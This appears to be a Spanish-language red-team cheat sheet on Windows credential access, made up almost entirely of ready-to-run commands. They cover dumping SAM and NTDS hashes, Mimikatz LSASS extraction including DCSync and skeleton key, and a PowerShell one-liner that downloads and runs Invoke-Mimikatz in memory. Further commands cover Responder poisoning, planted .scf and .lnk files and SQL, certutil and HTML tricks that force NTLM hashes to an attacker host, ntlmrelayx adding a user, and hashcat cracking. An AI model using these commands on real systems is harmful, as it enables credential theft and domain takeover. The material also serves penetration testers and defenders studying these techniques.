===========================================================
  T2 - 6. ACCESO A CREDENCIALES
===========================================================
Tipos:
  - Texto claro (archivos)
  - Cifrados (SAM / NTDS.dit)
  - Hashes/tickets en memoria
  - Hashes via spoof local (InternalMonologue)
  - Hashes via spoof red (Responder, NTLMrelayx)

===========================================================
  SAM / NTDS - LOCAL
===========================================================
# Volcado de hives (con privilegios)
reg save HKLM\sam SAM
reg save HKLM\system SYSTEM
reg save HKLM\security SECURITY

# Parseo offline
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

===========================================================
  SAM / NTDS - REMOTO (Impacket)
===========================================================
# Volcado remoto
impacket-secretsdump [DOMINIO]/[USER]:[PASS]@[IP-OBJETIVO]

# Contra DC -> hashes de TODOS los usuarios del dominio
impacket-secretsdump [DOMINIO]/[USER]:[PASS]@[IP-DC]

# Con hashes (PtH)
impacket-secretsdump -hashes [LM]:[NT] [DOMINIO]/[USER]@[IP]

# Solo NTDS (DC)
impacket-secretsdump -just-dc [DOMINIO]/[USER]:[PASS]@[IP-DC]

--- HISTORICO DE CONTRASENAS ---
NtdsAudit.exe ntds.dit --history-hashes -s SYSTEM -p hashes_history.txt

===========================================================
  MIMIKATZ - MEMORIA (LSASS)
===========================================================
# Basico
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > salida.txt

# Modulos utiles
# SIEMPRE ejecutar primero:
privilege::debug            # elevar privilegios (obligatorio antes de sekurlsa/lsadump)

sekurlsa::logonpasswords    # credenciales en memoria
sekurlsa::tickets /export   # tickets Kerberos
sekurlsa::pth               # pass-the-hash
lsadump::sam                # SAM local
lsadump::dcsync /user:[DOMINIO]\krbtgt  # remoto sobre DC
kerberos::ptt [TICKET]      # pass-the-ticket
misc::skeleton              # skeleton key (DC)

--- POWERSHELL (sin disco) ---
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

===========================================================
  PROCDUMP (sin Mimikatz en disco)
===========================================================
# Volcar lsass
procdump.exe -accepteula -ma lsass.exe MyDump.dmp

# Alternativa GUI: Tareas -> Detalles -> click derecho lsass.exe -> Crear archivo de volcado

# Analisis offline
mimikatz # sekurlsa::minidump MyDump.dmp
mimikatz # sekurlsa::logonPasswords

===========================================================
  INTERNAL MONOLOGUE (sin admin)
===========================================================
# Fuerza acciones con NTLM bajado para obtener NetNTLM hashes
InternalMonologue.exe

===========================================================
  RESPONDER (LLMNR/NBT-NS/mDNS poisoning)
===========================================================
# Captura hashes NetNTLM en la red local
responder -I eth0 -wrf

# Solo analizar (sin envenenar)
responder -I eth0 -A

--- ARCHIVO .scf EN SHARE (auto-trigger) ---
[Shell]
Command=2
IconFile=\\[IP-ATACANTE]\share\test.ico
[Taskbar]
Command=ToggleDesktop

--- ARCHIVO .lnk EN SHARE (PowerShell) ---
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut(".\@enlace.lnk")
$lnk.TargetPath = "\\[IP-ATACANTE]\@threat.png"
$lnk.Save()

===========================================================
  NTLMRELAYX (capturar y reusar)
===========================================================
# Comando arbitrario en target
impacket-ntlmrelayx -t [IP-OBJETIVO] -c '[COMANDO]'

# Anadir usuario
impacket-ntlmrelayx -t [IP-OBJETIVO] -c 'net user NtlmRelay Abc123.. /add'

# Volcar SAM
impacket-ntlmrelayx -t [IP-OBJETIVO]

# Solo capturar hashes (no relay)
impacket-ntlmrelayx -t [IP-OBJETIVO] --no-smb-server

===========================================================
  FORZAR ENVIO DE HASHES
===========================================================
# MSSQL
EXEC xp_dirtree '\\[IP-ATACANTE]\pwn', 1, 1

# Windows desde linea de comandos
certutil -addstore root \\[IP-ATACANTE]\share\cert.cer

# HTML / XSS
<img src="\\[IP-ATACANTE]\test.ico" height="1" width="1" />

===========================================================
  HASHCAT - PASSWORD CRACKING
===========================================================

--- MODOS DE HASH (-m) ---
1000   NTLM
5500   NetNTLMv1
5600   NetNTLMv2
1800   sha512crypt (Linux shadow)
13100  Kerberos TGS-REP RC4 ($23)
19700  Kerberos TGS-REP AES256 ($18)
18200  Kerberos AS-REP

--- ATAQUES (-a) ---
0  Wordlist
1  Combinator (2 wordlists)
3  Mask
6  Hibrido wordlist + mask
7  Hibrido mask + wordlist

--- WORDLIST BASICA ---
hashcat -a 0 -m 1000 [HASHES] /usr/share/wordlists/rockyou.txt -d 1

--- WORDLIST + REGLAS ---
hashcat -a 0 -m 1000 [HASHES] [DICCIONARIO] -r [RULES] -r [RULES2] -d 1
# Funciones: l (lower) u (upper) c (capitalize) $X (append) ^X (prepend) sa4 (replace)

--- MASK ---
hashcat -a 3 -m 1000 [HASHES] -d 1 ?u?l?l?l?l?l?d?d?d?d
# ?l lowercase  ?u uppercase  ?d digit  ?s symbol  ?a all

--- COMBINATOR (estatico + mask) ---
hashcat -a 3 -m 1000 [HASHES] -d 1 Rooted?d?d?d?d

--- HIBRIDO (dic + mask) ---
hashcat -a 6 -m 1000 -d 1 [DICCIONARIO] ?d?d?d?d

--- VER PROGRESO ---
# Pulsar 's' durante el crackeo

--- VER CRACKED ---
hashcat -m 1000 [HASHES] --show
